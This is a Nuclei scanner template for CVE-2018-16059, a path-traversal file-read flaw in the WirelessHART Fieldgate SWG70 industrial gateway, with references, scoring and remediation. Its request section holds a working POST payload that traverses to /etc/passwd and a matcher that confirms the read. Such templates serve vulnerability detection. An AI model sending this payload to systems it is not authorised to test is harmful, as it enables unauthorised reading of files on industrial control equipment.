nuclei-templates/http/cves/2018/CVE-2018-16059.yaml

47 lines
1.5 KiB
YAML
Raw Normal View History

2021-07-19 10:16:19 +00:00
id: CVE-2018-16059
info:
name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
2021-07-19 10:16:19 +00:00
author: daffainfo
2021-07-19 18:45:32 +00:00
severity: medium
description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.
reference:
- https://www.exploit-db.com/exploits/45342
- https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342/
2023-07-15 16:29:17 +00:00
- https://cert.vde.com/en-us/advisories/vde-2019-002
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-16059
cwe-id: CWE-22
2023-08-31 11:46:18 +00:00
epss-score: 0.60231
epss-percentile: 0.97328
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: endress
product: wirelesshart_fieldgate_swg70_firmware
tags: cve,cve2018,iot,lfi,edb
2021-07-19 10:16:19 +00:00
http:
2021-07-19 10:16:19 +00:00
- method: POST
path:
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
2023-07-11 19:49:27 +00:00
2021-07-19 10:16:19 +00:00
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
matchers-condition: and
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
2021-07-19 10:16:19 +00:00
regex:
- "root:.*:0:0:"
2021-07-19 10:16:19 +00:00
- type: status
status:
- 200